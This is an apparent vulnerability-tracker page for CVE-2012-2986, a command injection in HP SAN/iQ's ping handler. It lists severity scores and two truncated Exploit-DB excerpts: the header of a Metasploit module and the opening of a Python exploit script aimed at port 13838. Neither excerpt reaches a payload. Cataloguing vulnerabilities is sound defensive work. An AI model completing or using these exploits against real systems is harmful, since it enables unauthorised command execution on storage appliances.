CVE-2012-2986
published 2012-08-20CVE-2012-2986: lhn/public/network/ping in HP SAN/iQ 9.5 on the HP Virtual SAN Appliance allows remote authenticated users to execute arbitrary commands via shell…
PriorityP348high7.7CVSS 2.0
AVAACLAuSCCICAC
EXPLOIT
EPSS
4.42%
90.1th percentile
lhn/public/network/ping in HP SAN/iQ 9.5 on the HP Virtual SAN Appliance allows remote authenticated users to execute arbitrary commands via shell metacharacters in the (1) first, (2) third, or (3) fourth parameter. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-4361.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | san_iq | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)
exploitdb·2012-05-21
CVE-2012-4362 HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)
HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
'Description' => %q{
This module exploits a vulnerability found in HP's StorageWorks P4000 VSA,
versions prior to 9.5. By using a default account credential, it is possible
to inject arbitrary commands as part of a ping request via port 13838.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nicolas Gregoire', #Discovery, PoC, additional assistance
'sinn3r' #M
Exploit-DB
HP VSA - Remote Command Execution
exploitdb·2012-02-17
CVE-2012-4362 HP VSA - Remote Command Execution
HP VSA - Remote Command Execution
---
#!/usr/bin/python
''' ==================================
Pseudo documentation
================================== '''
# HP VSA / SANiQ Hydra client
# Nicolas Grégoire
# v0.5
''' ==================================
Target information
================================== '''
HOST = '192.168.201.11' # The remote host
PORT = 13838 # The hydra port
''' ==================================
Imports
================================== '''
import getopt
import re
import sys
import binascii
import struct
import socket
import os
''' ==================================
Define functions
================================== '''
# Some nice formatting
def zprint(str):
print '[=] ' + str
# Define packets
def send_Exec():
zprint('Send Exec')
# RESTRICTIONS
# You can'
No writeups or analysis indexed.
2012-08-20
Published